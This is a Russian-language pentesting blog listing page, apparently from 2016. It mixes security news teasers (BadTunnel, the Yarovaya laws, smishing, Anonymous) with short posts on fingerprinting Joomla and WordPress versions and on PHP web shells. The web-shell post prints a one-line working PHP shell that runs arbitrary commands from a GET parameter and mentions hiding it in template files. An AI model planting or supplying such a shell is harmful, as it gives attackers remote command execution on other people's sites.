Пентестинг

Информационная безопасность (ИБ), Пентестинг (pentesting), этичный хакинг и анализ на проникновения

Критическая уязвимость позволяет перехватывать весь сетевой трафик юзеров Windows

Исследователи из ИБ-подразделения компании Tencent под названием Xuanwu Lab обнаружили серьезную ошибку в реализации протокола NetBIOS, использующейся в Windows. Критическая уязвимость получила название BadTunnel — она позволяет злоумышленникам полностью контролировать сетевой трафик жертвы.

В чем проблема?

Владимир Путин подписал пакет законов Яровой

Президент России Владимир Путин подписал антитеррористический пакет законов, разработанный депутатом Ириной Яровой, а также главой комитета Совфеда по обороне и безопасности Виктором Озеровым. Об этом, как передает корреспондент «Ленты.ру», сообщил пресс-секретарь главы государства Дмитрий Песков.

Европу атакуют фишинговые SMS или смишеры

В 2016 году компания FireEye зафиксировала несколько фишинговых SMS-кампаний на территории Западной Европы. За период с февраля по июнь было обнаружено 55 вредоносных бинарников, используемых в этих атаках; примечательно, что во всех случаях так называемые смишеры распространяли ссылки на оверлейных Android-зловредов.

Как определить номер версии в CMS Joomla! и Wordpress?

Иногда, в качестве разведки, нужно определить точную версию CMS работающую на удаленном хосте. Это можно сделать разными путями, сегодня мы рассмотрим CMS Joomla! и Wordpress.

У Joomla! есть путь с раскрытием версии - www.site.ru/language/en-GB/en-GB.xml
И мета-тег, если не отключен параметр "Показывать версию Joomla!"  <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />

PHP web Shell

Иногда нужно внедрить web shell на сайты с CMS Joomla! и Wordpress. Для управления и изучения структур каталогов web-сервера. Чаще всего они размещаются в файлах шаблонов, чтобы они были незаметны. И их там и стоит искать в первую очередь при различных взломах Ваших сайтов и поражении вирусами...
<?if (isset($_GET['cmd'])) system($_GET['cmd']) ?>

Информация дана исключительно в ознакомительных целях!

Как на принятие «пакета Яровой» отреагировали IT-индустрия, Эдвард Сноуден и Павел Дуров?

Госдума РФ приняла сразу во втором и третьем чтениях так называемый «антитеррористический пакет» законопроектов (№1039149-6), разработанный депутатом Ириной Яровой и сенатором Виктором Озеровым. СМИ уже назвали законопроект «самым жестким за много лет», и представители индустрии в целом согласны с мнением журналистов.

Марк Цукерберг заклеивает камеру и микрофон на своем ноутбуке...

И на сегодня одна из главных новостей о тотальном контроле и отсутствии анонимности... "Марк Цукерберг заклеивает камеру на своем ноутбуке..."

Мошенники используют Олимпийские игры для кражи денег у юзеров

Мошенники уже нашли новый способ мошенничества. Злоумышленники используют предстоящие Олимпийские игры в Рио-де-Жанейро для кражи денег у юзеров. Они получают данные банковских карт, предлагая пользователям билеты на спортивные мероприятия с большой скидкой.

Хакеры из Anonymous заявили о начале кампании против банков по всему миру

Хакерская группа Anonymous заявила, что в течение 30 дней будет атаковать сайты центробанков по всему миру, сообщает Рейтер со ссылкой на видеообращение, опубликованное группой на YouTube.

В среду центробанк Греции заявил, что накануне Anonymous устроила кибератаку на его сайт. Атака длилась несколько минут, затем IT-специалисты банка смогли остановить ее. DDoS-атака затронула только веб-сайт банка, приводит агентство слова анонимного представителя банка.

Школьник взломал Instagram и заработал $10000

Школьник из Финляндии стал самым молодым обладателем награды Bug Bounty за всю историю Facebook, и даже за всю историю IT. Десятилетний парень по имени Яни (родители фамилию не говорят) нашёл способ удаления произвольных комментариев к сообщениям в соц. сети Instagram, сообщает финская газета Iltalehti.

RSS-материал